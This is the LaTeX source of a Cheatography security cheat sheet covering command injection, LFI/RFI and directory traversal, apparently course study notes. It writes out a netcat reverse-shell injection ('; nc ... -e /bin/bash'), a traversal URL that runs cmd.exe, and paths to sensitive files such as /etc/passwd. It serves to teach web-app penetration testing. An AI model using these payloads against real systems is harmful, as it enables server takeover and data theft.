\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{binca} \pdfinfo{ /Title (command-inj-lfi-rfi-and-directory-traversal.pdf) /Creator (Cheatography) /Author (binca) /Subject (Command Inj, LFI/RFI, and Directory Traversal Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{918027} \definecolor{LightBackground}{HTML}{F8F7F1} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Command Inj, LFI/RFI, and Directory Traversal Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{binca} via \textcolor{DarkBackground}{\uline{cheatography.com/44948/cs/13340/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}binca \\ \uline{cheatography.com/binca} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 9th November, 2017.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Definition and Purpose}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Enables inputting of OS commands through the web app} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Types of commands geared to {\bf{Local Results}} and {\bf{Remote Results}}} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Commands can be picked based on OS determined during mapping} \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Command injection provides control of server running with privileges of web apps.} \tn % Row Count 8 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Discovering Command Injection}} \tn \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Focus on resources that appear to be used on the system: \newline % Row Count 2 (+ 2) - New accounts require directory \newline % Row Count 3 (+ 1) - App accepting username parameter \newline % Row Count 4 (+ 1) - Runs mkdir username \newline % Row Count 5 (+ 1) {\bf{Useful characteristics: \& , \&\& , || , \textless{} , \textgreater{} , ; , | }}% Row Count 7 (+ 2) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.16 cm} x{5.84 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Command Injection Results}} \tn % Row 0 \SetRowColor{LightBackground} Visible Results & Results returned to the browser. Directory listing ; ls /etc \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} Blind Results & Nothing displayed in browser. Ping yourself, run a sniffer and look for ICMP echo requests. \tn % Row Count 7 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{The id command is handy because it shows privileges (uid, gid, and group memebership) of current user it is a small command that is widely available and usually in a default path /usr/bin/id.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Open a Reverse Shell with Command Injection}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{In Terminal run: nc -lvvnp 1337} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Injectable location: {[}valid entry{]}; nc {[}web server{]} 1337 -e /bin/bash} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Book 3 pages 55-56 for other methods} \tn % Row Count 4 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.04 cm} x{4.96 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Local and Remote File Inclusion}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{Local File Inclusion}} & Read files from the server (Information Disclosure) \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} {\bf{Remote File Inclusion}} & Retrieve files from a remote server. Potential for code execution since the contents of a file is used by app. \tn % Row Count 8 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{File inclusion flaws can retrieve LFI or RFI from the perspective of the app.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Directory Traversal}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Vulnerability that enables an attacker to leave web root.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Can then run and, load files from "protected" areas through file inclusion.} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Sometimes it only requires enough "../../../../../" to escape, others require encoding such as Unicode.} \tn % Row Count 7 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Note: IIS was vulnerable several times and the solution included tracking "/", but this was defeated by encoding in Unicode because decoding occurred after directory constraints enforced.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Command Injection: Traditional Example}} \tn \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Leaves web root allowing access to files on system including program execution. \newline % Row Count 2 (+ 2) Example: \newline % Row Count 3 (+ 1) \seqsplit{http://someURL/scripts/../../../windows/system32/cmd.exe+/c+dir} \newline % Row Count 5 (+ 2) This runs cmd.exe and retrieves directory listing, must start in scripts directory due to default restriction that executable code must run from there. \newline % Row Count 9 (+ 4) May use encoding to bypass controls.% Row Count 10 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Note: Patches are available for all servers known to be vulnerable.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Command Inj: Application Example}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Many apps load files such as templates, configs and data.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Focus on parameters used to load files \seqsplit{http://url/index.php?templ=../include/config.inc}} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{App fails to verify format and function, nor does it filters enabling an attacker to append commands after the = sign.} \tn % Row Count 7 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Not always immediately identifiable, ma be hidden field.} \tn % Row Count 9 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Any code accessing files in the server file system may be vulnerable.} \tn % Row Count 11 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Testing for Directory Traversal and File Inclusion}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Most important thing is where in the "current working directory" you are when executing scripts/apps.} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{If found, enter paths based on OS detection during mapping. \{\{nl\}\} /etc/passwd = usernames in UNIX \{\{nl\}\} /global.asax = App config on IIS \{\{nl\}\} \textbackslash{}docume-1\textbackslash{}user\textbackslash{}mydocu\textasciitilde{}1 = User directory on Windows 8.3 \{\{nl\}\} \textbackslash{}windows\textbackslash{}system32\textbackslash{}cmd.exe = execute commands on Windows} \tn % Row Count 9 (+ 6) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Note: /var/www or /var/www/html are often web root on Debian-Linux systems with Apache. \newline /home/username/public\_html/ is the location of users with their own web root \newline /usr/lib/cgi-bin is a common directory for CGI scripts} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}